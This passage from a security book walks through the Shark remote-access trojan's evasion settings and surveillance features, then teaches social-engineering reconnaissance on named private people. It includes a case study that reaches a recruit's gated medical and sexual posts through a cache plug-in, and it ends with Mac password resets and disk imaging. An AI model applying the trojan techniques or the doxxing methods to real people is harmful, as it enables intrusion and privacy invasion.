Process: tcpview. Reaction: Panic Mode 3 (Cut connections while proc. running) 
Process: Wireshark. Reaction: Panic Mode 2 (Remove Server) 
Process: ad-aware. Reaction: Panic Mode 1 (Close Server) 
Bound files: malware.exe (Destination: %windir%\malware.exe) 

Attributes 
Start message: Disabled 
Execute file on start: Disabled 
Open web page on start: Disabled 
Server type: Aggressive server 
Server is terminated when a debugger is detected. 
Server is terminated when VMware Workstation is detected. 
Server is terminated when Norman Sandbox is detected. 
Server gives out a message when VMware Workstation is detected, before it kills itself. 
Server uses alternative HKCU-RegRun startup on guest systems. 
Server uses alternative AppData-RegRun install directory on guest systems. 
Server file creation time will be modified. 
File attributes will be modified. 


Command and Control with Shark 


Once the hacker has placed the file on the victim, the hacker can start commanding and 
controlling it once it beacons. Notice that Shark has the ability to do all of the same things that 
Poison Ivy can do, with the addition of a few nifty features, such as 


■ CD-keys: Shark will steal CD-keys from the system. 
■ Printer: Allows you to print on the connected printer. 


Just like Poison Ivy, in order to interact with victims, double click on the victim itself and it will 
bring up the screen shown in the screenshot. 


[Figure: Shark 2.4.0 client window for victim admin (Administrator @ VICTIM, 10.9.2.3), menu Server / Suspend / Options / Show Transfer Queue. Tree: Server Info, Notes, Download Folder; Information (Installed Apps, Passwords, CD-Keys, Network Adapters, Active Ports); Tools (DOS Shell, Printer, Client2Client Chat, Client2Server Chat); Manager (Windows, Processes, Services, Registry Editor, File Manager, Search Files); Surveillance (Screen Capture, Webcam Capture, Keylogger, Audio Capture); Net Tools (Web Downloader, Host Redirect, Packet Sniffer, Reverse Proxy); Plugins. Status bar: Server accepted hello, ready! CPU Load 0%, Memory Load 87% (333,25 MB/383,48 MB).] 


Once again this shows the varying attributes of the affected host. Notice that within Shark you 
have the ability to grab information such as 


■ Information 
  — Installed apps: Checks for installed applications and allows uninstalling. 
  — Passwords: Allows you to dump the password hashes. 
  — CD-keys: Allows you to steal the CD-keys of software installed. 
  — Network adapters: Gives network adapter information. 
  — Active ports: Gives a list of active ports, can kill processes, and even capture packets. 
■ Tools 
  — DOS shell: Gives a full-fledged DOS shell. 
  — Printer: Allows the hacker to print output to the victim's printer. 
  — Client2Client/Client2Server chat: Allows chatting with the victim machine. 
■ Manager 
  — Windows: Gives a list of process names, paths, and PIDs. 
  — Processes: Gives a list of running processes and associated PIDs. 
  — Services: Gives a list of running services. 
  — Registry: Registry editor. 
  — File manager: Allows advanced searching of files. 
■ Surveillance 
  — Screen capture: Allows capture of the screen and remote desktop. 
  — Webcam capture: Allows viewing of an attached webcam. 
  — Keylogger: Allows capturing of the keyboard. 
  — Audio capture: Allows capturing of attached microphone devices. 
■ Net tools 
  — Web downloader: Allows downloading additional programs via the web. 
  — Host redirect: Allows redirecting requests to another host. 
  — Packet sniffer: Allows deep packet inspection of traffic on the network. 
  — Reverse proxy: Reverse proxy server. 


File Searching 


Shark has the ability to do complex file searching, which is helpful for targeting specific pieces of 
information, as it allows you to designate file extensions and look for certain byte-size ranges. 


[Figure: Shark Search Files view (Administrator @ VICTIM, 10.9.2.3). Options: Start Path; Search Mask (separate with ";", shown with jpg and mp? patterns); Possible Wildcards: ? (one sign), * (many signs); Include Subfolders; Ignore 0-Byte files; Minimum File-Size (Bytes): 400; Maximum File-Size (Bytes). Results list JPG files under C:\Documents and Settings with sizes from a few hundred bytes to about 8 KB; status: Finished, 140 Objects. Status bar: JPG Plugin uploaded, resending last command; CPU Load 0%, Memory Load 91%.] 
Printer 


Lastly, Shark gives you the ability to print to the victim's printer! 


[Figure: Shark Printer tool (Administrator @ VICTIM, 10.9.2.3): a text area with Font: Tahoma, Size: 12, Bold, Underlined, Strikethrough and Copies: 1 options. Status bar: User has returned from being away; CPU Load 1%, Memory Load 91%.] 


Summary 


Poison Ivy and Shark are advanced attack tools that the hacker can use for further penetration of the 
network. Using these tools aids in commanding and controlling multiple hosts, and helps in deeper 
infiltration into the network. Remember, these rely on obtaining initial access into the network, so 
the hard part is getting the servers onto the victim to better create a presence in the network. 


Chapter 12 


Social Engineering with Web 2.0 


Introduction 


Social engineering is a technique that can be utilized to convince people to divulge information about 
themselves, their company, or their organization. By doing some research beforehand, a hacker can 
trick someone into revealing details they would not normally disclose. If a hacker calls a Texas-based 
television provider and tries to order the HBO premium channel for George Bush, the agent would be 
more likely to complete the order when Mr. Bush’s correct address and phone number were provided. 
During the 1980s Kevin Mitnick became famous for his social engineering skills. The successful social 
engineering attacks Mitnick launched in the 1980s required great skill. However, with the advent 
of tools like MySpace, Facebook, Twitter, and others, social engineering has become a lot easier for 
hackers to do. I will refer to this new era of social engineering as “social engineering with Web 2.0.” 

By using the website www.zabasearch.com, you can locate just about anyone’s address. This 
includes the street address, city, state, and zip code. You can also get their phone number in some 
cases. It will also list previous addresses and the addresses of the person’s relatives. So, with the use 
of a single website, Zabasearch, you can have a lot of information about a person. 


[Figure: ZabaSearch result for a name: a street address on Rogers Ave, Upper Darby, PA, a phone number (area code 610), "Record Created: Unknown", and links: Check for Email Address, Confirm Current Phone & Address, Background Check, Check messages for; below it a ZabaSearch Map for the address. Sidebar: ZabaSearch Links, Top 25 Searched Names, Create a Public Record, Free Search Menu.] 
But the fun does not end there with Zabasearch. In some cases, you have the ability to zoom 
in on the map and see it at the street level. This can give a person detailed information about the 
house and its lot. Information about the lot might indicate if the person has a pool or a play- 
ground, or, as in the case of the house in the next figure, you may see the need for a new roof or 
lawn fertilizer. 


[Figure: ZabaSearch map of the property with Map / Satellite / Hybrid views, zoomed to street level (© 2010 Google).] 


You can also take the address and put it into Google. Google can map it for you and possibly 
even provide you with a street-level view of the person’s house. A street-level view of the house can 
provide you with even more information about the location where someone lives. 


[Figure: Google Maps search for the Rogers Ave, Upper Darby, PA address, with the result pin, Directions / Save to / more links, and a Street view link.] 


In this case, with the street view provided by Google, you can see that the house is 


■ White 
■ Has two buses in the front yard 
■ Has a large number of windows in the front of the house 
■ Has two trees covering most of the front of the house 
■ Has a sidewalk badly in need of repair 
■ Has a driveway on the right side of the yard with grass on it in need of repair 
■ Has some stone in the structure 
[Figure: Google Street View of the house, with nearby map labels for a restaurant and a food market.] 
Another way to get more pictures and even more information about a property is to go to the web- 
site www.zillow.com and type in the street address. Zillow is a free website that gives you a detailed 
description of the property as well as an estimate of the property's value. Details for the property often 
include the year it was built, square footage, and number of bedrooms and bathrooms. Don't you hate 
it when people air their dirty laundry on the Internet? (This house may lack a dryer.) 


[Figure: Zillow listing for the Rogers Ave, Upper Darby, PA property (Pennsylvania > Upper Darby Township): Recently Sold: $55,000; Zestimate: $159,000; Monthly payment: $297; Bathrooms: 2; Sqft: 1,850; Property type: Single Family; Year built: 1930; Last sold: October 07; further fields (Bedrooms, Lot size, Parking type, Cooling system, Heating system, Fireplace) and a More facts link.] 
Another utility that Zillow offers is a view of the street that the house is on, as well as "zestimates" 
of the prices of the surrounding houses in the neighborhood. 


[Figure: Zillow street-level summary: Recently Sold; Zestimate: $159,000; Beds: 3; Baths: 2.0; Sqft: 1,850; Lot: 6,000; views and Save links.] 


Zillow also offers additional views of the house, including 


■ Map 
■ Bird's eye 
  — Road 
  — Aerial 
■ Street 


[Figure: Zillow Maps and Views panel with Street View, Bird's eye and Labels options.] 


Another part of social engineering involves finding out where people work. There are a variety 
of methods to try to find out where someone works, but one of the easiest ways is to check the 
LinkedIn website. LinkedIn not only provides items such as employer and employment history, it 
also can provide the names and titles of the person’s coworkers and associates. 
[Figure: LinkedIn profile (Edit Profile / View Profile) for Jesse Varsalone, Computer Forensic Senior Professional at Champlain College, Baltimore, Maryland Area, Higher Education; Current: Assistant Professor at Champlain College.] 


What you will often find on the LinkedIn website is an entire month by month employment 
history of the person in their profile. Most individuals using LinkedIn also list the colleges they 
attended as well as the degrees they earned. People also often list industry certifications. 


[Figure: LinkedIn Summary section listing certifications: CISSP, MCT, MCSE, A+, Net+, Security+, CEH, CCNA, CIW, MCDBA, Oracle 8i/9i DBA, CTT+, Linux+; Experience: Assistant Professor.] 

Other social networking sites where you can get information about people include 


■ Facebook 
■ Twitter 
■ Formspring.me 
■ MySpace 
■ Bebo 
■ Friendster 
■ Hi5 
■ Yournight 


These social networking sites contain a wealth of information about people. The most popular of 
these sites is Facebook, with about 500 million users. Facebook has changed the way people com- 
municate and has enabled people to contact individuals they have not seen in years. 

While Facebook is a lot of fun to use, there are many dangers associated with it, including 


■ Information leakage 
■ Malicious links 


Even having your name alone listed on Facebook can leave you vulnerable to information leak- 
age. I have several relatives with liberal views whose children's last names are a combination of 
their father's and mother's last names. While that may suit the parents, their children may wind 
up being more vulnerable to identity theft because the mother's maiden name is often used as a 
security passphrase when a customer is contacting a credit card company or financial institution. 
Many women will list their maiden names so old friends can find them. 


[Figure: Facebook profile name showing a maiden name: Kim [Flanders] Varsalone.] 


Concerns about privacy often cause Facebook to change the amount of personal information 
that is displayed. At one time, the default was for Facebook to list the date of birth of a person. 
Date of birth is still listed for many accounts but is often only visible to friends or friends of friends. 


[Figure: Facebook Information box: Relationship Status: Married to ...; Children; Birthday: October 22, 1970; Current City: Baltimore, MD.] 


To change the Facebook settings so no one except you can see your birthday, 


1. Go to Account in the right-hand corner of the screen and select privacy settings. 
2. Click Customize Settings. 
3. Under Birthday, click the drop-down box. 
4. Select Customize. 
5. In the Customize Privacy settings, select Only Me in the These people drop-down box. 
6. Click Save Settings. 


[Figure: Facebook Custom Privacy dialog. Make this visible to / These people: Only Me ("Only I can see this."); Hide this from / These people; Save Setting button.] 


It is important to take steps to protect as much of your personal information as you can. 
Sometimes people are misled to believe that by protecting some information they are safe. 


[Figure: Facebook notice on a partly private profile: "People who aren't friends with [name] see only some of his profile information. If you know [name] personally, send him a message or add him as a friend."] 


This individual has made some of his profile private. He or she has also taken the additional 
step of omitting the year from their birthday. People will only be able to see the month and day. 


[Figure: Facebook Information box: Relationship Status: Married; Children; Birthday: June 12 (no year shown).] 
To change the Facebook settings so your birthday is not displayed, 


1. Click on Home in the right-hand corner of the screen. 
2. Click Edit my Profile under your name in the left-hand corner of the screen. 
3. Under Basic Information, under Birthday, select Don't show my birthday in my profile. 


[Figure: Facebook Basic Information, Birthday drop-down with the options: Don't show my birthday in my profile; Show my full birthday in my profile; Show only month & day in my profile. Below it: Interested In: Women.] 


While it is admirable that this person took some precautions by removing the year from their 
birthday, it may still be possible to determine their date of birth by examining other information 
on their “private profile.” By looking at the date of college or high school graduation, it may still be 
possible to determine the year the person was born. Most people are 17 or 18 when they graduate 
from high school. College graduation also may be a clue to age but it is less reliable. 


[Figure: Facebook Education entry: High School: Columbia High School '88.] 


Unfortunately, many people do not take any precautions to try to protect their personal infor- 
mation. Instead, they broadcast information all over Facebook, including 


■ Date of birth 
■ Occupation and work history 
■ Spouse's name 
■ Schools and the years they have attended them 
■ Children's names, ages, schools 
■ Likes and hobbies 
■ Interests, such as music 
■ Relationship status and sexual orientation 
■ Contact email, phone number, and street address 


Some people have no problem listing the names and ages of their kids as well as their street 
address. Generally, this is not something you want to disclose on the Internet. 


[Figure: Facebook Information box listing Relationship Status: Married to ...; Children with names and ages (3 years, 1 year); Birthday; Current City: Baltimore, MD; Hometown given as a street address in Baltimore, MD.] 
Other people want to tell you about their relationship status. This can reveal a lot about a person. 


[Figure: Facebook About Me / Basic Info: Sex: Female; Birthday: April 30; Children; Relationship Status: In an Open Relationship; Interested In: Men.] 


Some people reveal information that should never be disclosed under any circumstances. 


[Figure: Facebook Likes and Interests, Activities: Not Answering My Phone; vicodin; Show all (3).] 


When researching a person, go to Google and type their name and “facebook.com”. 


[Figure: Google search for "jesse varsalone facebook.com", About 24,700 results; top result "Jesse Varsalone | Facebook": "Jesse Varsalone is on Facebook. Join Facebook to connect with Jesse Varsalone and others you may know..." at www.facebook.com/varsalone.] 


If you have a Facebook account, you can search for people by any of the following methods: 


■ Name 
■ Email 
■ School 
  — Class year 
  — Classmate name 
■ Company 
  — Coworker name 


To search use the following link: http://www.facebook.com/?sk=ff#!/srch.php?ref=ffffc. 


[Figure: Facebook "Search for Friends on Facebook" form: Search By Name or E-mail (Person's Name or E-mail); Classmate Search (School Name, Class Year, Person's Name optional); Search by Company (Company, Person's Name optional).] 
This technique could be used by people to find information about people who work for a certain 
agency or company. The same technique can be used by people in information assurance to 
determine if any of their employees are leaking company data or information. Searching for email 
addresses is a technique that could be used by spammers or individuals attempting to spear phish 
a particular organization. 

In summary, Facebook provides a wealth of information about people. This information can 
be used for social engineering or by people trying to steal a person’s identity. The less information 
you put on the Internet, the better. And, as another countermeasure, you could flood these social 
networking sites with misinformation about yourself and your family. 


People Search Engines 


Another way to get a lot of information about people is to use a people search engine. The informa- 
tion on these websites includes 


■ Court/public records 
■ Addresses 
■ Phone numbers 
■ Email addresses 
■ Profession 
■ Publications 
■ Web pages 
■ Pictures 
■ Amazon.com wish lists 
■ Documents 


There are many of these sites out there, but these three sites seem to be among the most 
popular: 

■ Pipl.com 
■ 123people.com 
■ Spokeo.com 


To use Pipl, put in the first and last name of the person whose information you are trying to find. 
Add the city and the state of that person if you know it. Under Contact Details, Pipl will give you 
a list of the person's contact details, including their addresses and phone numbers. 




Under the category of Personal Profiles, you may see that person’s Amazon customer profile. 


Click on the person's name above Customer Profile to see their Amazon wish list. 




An Amazon wish list can tell you valuable information about a person. 




Pipl also tells you about the person's occupations and business relations. 




It also provides their birth details, including the month, day, and year, and the city where they were 
born. I remember several cases where "In what city were you born?" is a security question. 


The Quick Facts section of Pipl provides you with a general overview of the person. 




Other sections of Pipl include videos, publications, web pages, blog posts, and documents. 




A website that is similar to Pipl is 123people.com. It has a unique feature called a Tag Cloud, 
which gives you a lot of key phrases related to the person whose information you are getting. 




The first thing you will notice is pictures of the individual along with age, address, city, state, 
email address, and their phone numbers. In some cases, email and phone number information will 
be incomplete and you will be forwarded to pay services to get that information. 


Another thing that 123people.com will aggregate is videos that the person has posted online. 




The site 123people.com also provides web links and links to blogs and microblogs (Twitter). 
For some individuals, there can also be biographical and business professional information. There 
are also links to pay sites that provide you with criminal record checks of individuals. 




At the bottom of the page you will find a section called Related People, which includes a 
sample listing of the person's associates on Facebook and Twitter. You can click the All button to 
see additional listings, but it is not all-inclusive. There is also a listing of social networking profiles. 




Another people search site and information aggregator is Spokeo.com. When you first visit 
the site, you will notice that the motto is "Not your grandma's phonebook." Good motto. Spokeo 
allows you to search on any of the following parameters: 


■ Name 
■ Email 
■ Phone 
■ Friends 


When searching by name, Spokeo will return the results of people with the name you searched 
for with one or more addresses. Click on the address that you believe is the person’s current one. 
Spokeo will provide you with the following categories of information on the person: 


■ Basic information 
■ Property 
■ Family 
■ Social 
■ Neighborhood 
■ Wealth 


The basic info provides you with the following information on the subject you search for: 


■ Name with middle initial 
■ Phone number (mine was unlisted) 
■ Spouse name 
■ Sex 
■ Zodiac sign 
■ Race 
■ Marital status 
■ Rent or own status 
■ House value 
■ Age 
I don't know how this website got my unlisted phone number. I blame my wife for that one. 




The Property tab provides you with 


■ A picture of the residence and an estimated value of the property 
■ Lot size and property square footage 
■ Number of bathrooms and floors 




The Family tab provides you with 


■ Name and age of person 
■ Name and age of spouse 
■ Number of children 
■ Length in residence 


The Social, Neighborhood, and Wealth tabs cannot be viewed without a Facebook logon or 
a Spokeo account. Another option that can be used with the Spokeo website is the email search 
feature. The email address search can provide you with the following information: 


■ Name of person 
■ Photos 
■ Videos 
■ Blogs and updates 
■ Social networks 
  — eBay 
  — YouTube 
  — Windows Live 
  — PhotoBucket 
  — Zillow 
  — Yelp 
  — Xanga 
  — Last.fm 
  — TripAdvisor 
  — Many, many more 
■ IP addresses of the email server 
■ Validity of email address 


In this case, I tested an old email address of mine, and it came back with several hits, including 


■ Full name of Jesse Varsalone 
■ Quick mix from Pandora music service 
■ Amazon wish list 
■ Domain names I own 
■ The fact that I am a part of three social networks 


To use the View More feature, which will provide you with more detail about any of the links or 
information Spokeo has aggregated for that email account, you need to join their service. For a 
monthly fee totaling under $60 a year, you will get even more information on that account. 


A Case Study 


Sometimes when you work with smart people your job is a lot easier. Whenever I run into the best 
and brightest, I am always looking to recruit them to work with me. I met one couple and I talked 
to the guy, who was in education, about coming to work in a nontechnical role with my employer. 
The man and his female companion were very friendly, and she seemed to be extremely motivated to 
get her partner to switch occupations for financial reasons. Before referring the person to the job, 
I thought I would do a little research on them. So, I threw the email address in Google, and only 
got a single hit on that email address. 




When I tried to visit the site that was connected to that person's email address, it gave me an 
error saying that I was not permitted to view the member profile without signing in to the site. 
I was able to determine that the website was for people who had weight loss surgery. 


I was still very interested in viewing that person's member profile. I tried to view any of the 
pages that might be in Google's cache, but the web page was not available to view in Google cache 
either. So, I tried to use the Passive Cache plug-in for Firefox to view content on the web page. 




Information in the forum, which was viewable with the Passive Cache plug-in, included 


■ Name 
■ Date of birth and age 
■ Interests 
■ City and state 
■ Pre- and post-op weight 
■ Name of doctor who performed surgery 
■ Type of surgery 




Before using the information I found in the forum with Passive Cache, I decided to google the 
initial part of the email address (without the @yahoo.com). This technique yielded me a lot 
more information about the individual. Several of the links were for "swinger" websites. 


When I clicked on the first link in Google, this person had a post in a forum with a picture of 
them in a bathing suit. They were on the car where you could clearly see the make and model of 
the car. You were also able to see the license plate of the vehicle clearly in the picture. 



Then I clicked on the Twitter link, which enabled me to view many tweets of that person. The 
person's real name was on Twitter. The tweets provided me with information about the person 
such as 

■ Interests 
■ Hangout locations 
■ Favorite sports teams 
■ Relationship status 
■ Clothing preferences 




Once I had the real name of the person, I went to Facebook.com and typed the person's real 
full name. The first time I went there, their profile was public and I was able to see everything 
written on their wall. The next time I visited the individual's Facebook site when I was writing 
up this case study, they had set their profile to private. While I was initially disappointed, 
I felt that even with that setting, you can still see plenty of information on that individual, 
including: 

■ Friends 
■ Likes 
■ Quotes 
■ Music interests 


Summary 


Social engineering is a technique used by skilled hackers to get information about individuals that 
they can use during their "attack." With the popularity of websites like Twitter and Facebook, 
individuals are more likely to give out information about themselves to the entire Internet. Any 
person with a computer and Internet access can view the publicly available information. It is a 
good practice for people to lock down their security settings on social networking sites such as 
Facebook. The less information you put on the Internet, the better. 

There are also sites that aggregate information about people, including Pipl, 123people.com, 
and Spokeo. These sites have a lot of information about individuals, like their address, date of 
birth, and occupation. In some cases, you will even be able to find the person's Amazon wish list. 
People in information assurance can use any of these sites to their advantage. They might try to 
research potential future employees or to find out if any information about people within their 
organization and company has leaked to the public. As the Internet continues to grow and identity 
theft continues to rise, try to keep your information personal by keeping your name off the 
Internet as much as possible. This chapter demonstrates why it is a good idea to try to keep your 
personal information as private as possible. 


Chapter 13 
Hack the Macs 


Introduction 


Since the Mac is such a popular tool among hackers and the younger, hipper generation, I determined 
that a chapter should be dedicated to them. One reason Macs are much more widely used 
than they used to be is the fact that the newer ones run on Intel-based platforms. That means 
on newer Macs, you have the ability to install Microsoft Windows or even Linux. If you ran 
an older Mac, it ran OS 9. What I hated the most about that operating system is the fact that 
it did not allow you to get to a command-line environment. Hackers prefer the command line, 
and Mac OS 9 was basically all graphical user interface (GUI). Figure 13.1 is not a picture of an 


Figure 13.1 An older iMac running Mac OS 9. 
old television monitor; it is what is now referred to as a classic Mac. This Mac wound up in the 
Howard County, Maryland Landfill. 

With OS X, everything changed for Mac. They began a new UNIX-based operating system, 
some say based on FreeBSD. This Mac gave users access to the all-important command 
environment. To get access to a terminal on a modern Mac running OS X, 


1. Select Go from the Menu bar. 
2. Select Utilities. 
3. Double click on the Terminal icon. 


Terminal — bash — 82x28 

Last login: Tue Nov 30 21:12:27 on ttyp1 
Welcome to Darwin! 
MyMac:~ Jesse$ ls 
Desktop    Library    Music      Public 
Documents  Movies     Pictures   Sites 
MyMac:~ Jesse$ pwd 
/Users/Jesse 
MyMac:~ Jesse$ who 
Jesse    console  Nov 30 20:56 
Jesse    ttyp1    Nov 30 21:12 
MyMac:~ Jesse$ ls /Users/mason/ 
Desktop    Library    Music      Public 
Documents  Movies     Pictures   Sites 
MyMac:~ Jesse$ ls -la /Users/mason/ 
total 24 
drwxr-xr-x  12 mason  mason   408 Aug 23  2008 . 
drwxrwxr-t   9 root   admin   306 Nov 30 20:56 .. 
-rw-r--r--   1 mason  mason     3 Aug 23  2008 .CFUserTextEncoding 
-rw-r--r--   1 mason  mason  6148 Aug 23  2008 .DS_Store 
drwx------   3 mason  mason   102 Aug 23  2008 Desktop 
drwx------   3 mason  mason   102 Aug 23  2008 Documents 
drwx------  19 mason  mason   646 Aug 23  2008 Library 
drwx------   3 mason  mason   102 Aug 23  2008 Movies 
drwx------   3 mason  mason   102 Aug 23  2008 Music 
drwx------   3 mason  mason   102 Aug 23  2008 Pictures 
drwxr-xr-x   4 mason  mason   136 Aug 23  2008 Public 
drwxr-xr-x   5 mason  mason   170 Aug 23  2008 Sites 
MyMac:~ Jesse$ 


Apple decided to name all of their releases of Mac OS X after some type of wildcat. Here is an 
easy way for you to remember them all. There will be a quiz at the end of the chapter. 


10.0 | Cheetah      | Check 
10.1 | Puma         | Please 
10.2 | Jaguar       | Just 
10.3 | Panther      | Please 
10.4 | Tiger        | Tip 
10.5 | Leopard      | Low 
10.6 | Snow Leopard | Sir 
10.7 | Lion         | Lancelot 


Apple has done a great job of targeting their products, such as iMacs, iPhones, iPads, and 
iPods, to the younger generations (see Figure 13.2). The company is well known for their innova- 
tions and their famous commercials. 

Chapter 1 told you how to bypass a password in Microsoft Windows and Chapter 2 showed 
you how to recover them. Apple actually makes it even easier. The password on a machine can be 
Figure 13.2 A newer Mac running OS X is a favorite among younger generations. 


changed simply by booting to the install CD. However, that will not work effectively if the Mac 
has FileVault enabled for that user. FileVault is an Apple technology that encrypts the user's home 
folder. This is different from Microsoft's BitLocker, which encrypts the full volume. BitLocker is 
only available on the Ultimate and Enterprise editions of Windows 7 and Vista. Mac only has one 
version, and it comes with FileVault. 

To boot to the Mac OS X install DVD (for password reset), 


1. Hold down the Option key on the keyboard and turn the PC on. 
2. Select the Mac OS X install DVD as the boot choice. 
3. Choose your language and click Next at the Language Selection screen. 


4. Select Utilities from the Menu bar and choose Reset Password. 




5. Click the Hard Drive icon and select the user you want to reset the password for. 




6. While you are there, select the system administrator and reset that password also. 


7. Restart the system and the new password should work. 


Another way the Mac can be exploited (or most computers for that matter) is to take an 
image of the system. A Mac can boot to a variety of live CDs such as Raptor, HELIX, and 
BackTrack. 


To boot to a live CD on a Mac, 


1. Hold down the Option key on the keyboard and turn the PC on. 
2. Select Windows as the boot choice. 
3. Click the Windows arrow. 


4. Open a terminal in Windows and type the following command: fdisk -l. 




5. Add your USB (or Firewire) mass storage device. 
Note: The USB device should be formatted new technology file system (NTFS). If you used 
FAT32, you would need to split the images into pieces because the largest size file allowed 
on an FAT32 system is slightly under 4 GB. Don't use HFS+ because many of the live CD 
distributions that are largely Linux-based will not be able to read the file system. 
6. Type the following command again to see the newly added device: fdisk -l. 




7. Make a directory called images by typing mkdir /mnt/sdb1/images. 
8. Change to the directory by typing cd /mnt/sdb1/images. 
9. Image the system by typing the following command: dd if=/dev/sda of=mac.dd. 




Note: You could make your life easier by calling the image mac.dmg instead of mac.dd. 


Later versions of the Mac OS X operating system can read NTFS, but they cannot write to it. 
It is more standard practice to give a DD image a .dd extension, but naming it .dmg will save 
you from having to go through the step of installing NTFS-3G so you can rename this file. After 
the Mac has finished imaging, your terminal will return to the pound (#) sign. The easiest way 
to analyze this image is by putting it on another Mac. In order to write to the external hard drive 
formatted with the NTFS file system, you will need NTFS-3G. Go to http://macntfs-3g.blogspot.com 
to download the NTFS-3G driver for Mac OS X. There is also a commercial product from 
Paragon Software that provides NTFS support. 
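The imaging step above (dd if=/dev/sda of=mac.dd), as an added example that is not the book's own code: it runs dd against a constructed sample file standing in for /dev/sda, records the SHA-256 of source and image so the copy can be shown to be faithful, and splits the image into pieces for the FAT32 case from the step 5 note. The file names, block size and chunk size are my choices, not from the book.

```shell
#!/bin/sh
# Added example: the "dd if=/dev/sda of=mac.dd" step from the imaging
# procedure, with the hash verification an examiner adds so the copy can
# be shown to be faithful, plus the split the FAT32 note calls for.
# The "device" is a constructed sample file, not a real disk.

# Print the SHA-256 of a file; coreutils sha256sum on Linux live CDs,
# shasum on Mac OS X.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# image_and_verify SOURCE IMAGE
# Copies SOURCE to IMAGE with dd, hashes both sides, writes the image hash
# next to the image (IMAGE.sha256) and succeeds only if the hashes match.
image_and_verify() {
    src="$1"
    img="$2"
    # bs is a plain byte count so the same line works with GNU and BSD dd.
    dd if="$src" of="$img" bs=65536 2>/dev/null || return 1
    src_hash=$(hash_file "$src")
    img_hash=$(hash_file "$img")
    printf '%s  %s\n' "$img_hash" "$(basename "$img")" > "$img.sha256"
    [ "$src_hash" = "$img_hash" ]
}

# split_image IMAGE CHUNK_BYTES
# Writes IMAGE.aaa, IMAGE.aab, ... no larger than CHUNK_BYTES each (on a
# FAT32 volume every piece must stay under 4 GiB), then concatenates the
# pieces back and succeeds only if the result hashes like the whole image.
split_image() {
    img="$1"
    chunk="$2"
    split -b "$chunk" -a 3 "$img" "$img." || return 1
    joined=$(mktemp) || return 1
    cat "$img".??? > "$joined"
    status=1
    [ "$(hash_file "$img")" = "$(hash_file "$joined")" ] && status=0
    rm -f "$joined"
    return $status
}

# Count the pieces produced by split_image for IMAGE.
piece_count() {
    ls "$1".??? | wc -l | tr -d ' '
}

# Demonstration on a constructed 300,000-byte "disk".
demo() {
    work=$(mktemp -d) || return 1
    dev="$work/sample_disk.bin"
    head -c 300000 /dev/urandom > "$dev"
    if image_and_verify "$dev" "$work/mac.dd"; then
        echo "image verified: $(cat "$work/mac.dd.sha256")"
    else
        echo "hash mismatch: image is not a faithful copy" >&2
        return 1
    fi
    if split_image "$work/mac.dd" 100000; then
        echo "split into $(piece_count "$work/mac.dd") pieces, reassembly verified"
    fi
    rm -rf "$work"
}

demo
```

Keep the .sha256 file with the image: re-hashing the image later and comparing against it is how you show the evidence has not changed since acquisition.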

To install the NTFS-3G driver for Mac OS X, 


1. Download the DMG file from http://macntfs-3g.blogspot.com. 
2. Double click the DMG file. 


3. Double click Install NTFS-3G. 




4. Click Continue at the Welcome to the NTFS-3G installer screen. 




5. Click Continue at the Software License Agreement screen. 




6. Click Agree if you agree to the terms of the software license agreement. 


7. Put in the password if required. 


8. Click Install. 




9. Select No caching (the safer option). 


10. Restart your machine. 




Now it is time to read that image file. This method will not allow you to view deleted files and 
folders. In order to do that, you will need a forensic tool like EnCase, FTK, X-Ways, PTK, or 
Autopsy. However, you will be able to see everything that was not deleted on that drive unless 
they were using some form of encryption like FileVault or TrueCrypt. Attach your LaCie drive 
with the NTFS file system. 

To read the DD image on Mac OS X, 


1. Hold down the Control key, click the image file, and select Get Info. 


E untitled 
E EXCHANGE Open With 


Print 
Get Info 4———— 


[suem enger gi: wei 


2. Click the Name & Extension category. 


wy Name & Extension: 
mac.dd 
LL] Hide extension 


b» Open with: 
Y Preview: 


* Ownership & Permissions: 
You can read and write 


338 " Defense against the Black Arts 


3. Change the extension from DD to DMG. 


Y Name & Extension: 
__) Hide extension 


b» Open with: 
* Preview: 


* Ownership & Permissions: 


You can read and write 
aa 


4, Answer “yes” to the question, “Are you sure you want to change the extension from “.dd” to 
“dmg”?” 
|^ R ^] 


Are you sure you want to change the extension 
from ".dd" to “dmg”? 


K If you make this change, your document may open in a 
different application, 


5. You now have the ability to browse through files and folders. 


Now, you have the ability to locate the following items on the disk using search: 


■ Videos 
■ Photos 
■ MP3s 
■ PDFs 
■ Documents 
■ plists 
■ Internet history 
— Safari 
— Firefox 
— Opera 
Mac OS X and Safari 5 Internet Artifacts 


A lot of the good stuff can be found in people’s Internet caches. Safari is the main browser used 
on the Mac OS X operating system, so this next section will cover Safari artifacts in detail. Apple, 
as always, keeps changing how Safari artifacts are stored. Previously, these artifacts were stored in 
the system domain. Firefox and Chrome have been making inroads for Mac users. Even those that 
use Safari aren't always using the newest version of Safari. Previously these artifacts were located 
in the following directory: /private/var/folders/[2 character folder]/[27 character folder]/Caches/ 
com.apple.safari/. 


[Screenshot: the Google home page open in Safari.] 


On OS X 10.6.4 running Safari 5, the Internet history artifacts have moved back to the user 
domain. One will notice that there are even more artifacts because of the new features that Apple 
has incorporated into their newest browser. Let’s first look at Safari and its features. 
The Safari menu bar has options for blocking pop-ups, private browsing mode, resetting Safari, 
and emptying the cache. Some of these have forensic implications, like private browsing, which 
will keep Safari from storing personal information, in case someone images your Mac. 


[Screenshot: the Safari menu, showing About Safari, Report Bugs to Apple..., Preferences..., Block Pop-Up Windows, Private Browsing..., Reset Safari..., Empty Cache..., Hide Safari, Hide Others, Show All, and Quit Safari, over the Google home page.] 


The following settings within the Safari browser will have forensic implications: 


1. Private Browsing: Prevents any history and caching of events. Private browsing does a decent 
job, but selecting Keyword Searching with a forensic tool like EnCase will reveal some rem- 
nants of the private browsing session. 

2. Empty Cache: This is one feature that allows the user to empty the Cache.db in his user pro- 
file. This feature will protect users from tools that are able to parse information from Internet 
history. The following image is a Cache.db file that has NOT been erased using the Empty 
Cache feature of Safari. 


[Screenshot: Cache.db opened in a SQLite browser, showing rows 1 to 1,000 of 7,098; the blob columns begin with <?xml version=, <!DOCTYPE html, GIF89a and PNG headers.] 
A 
After utilizing the Empty Cache feature of Safari, the Cache.db file has no remnants. 


[Screenshot: the same Cache.db after Empty Cache: the blob table (columns response_object, request_object, proto_props, user_info) contains no rows.] 
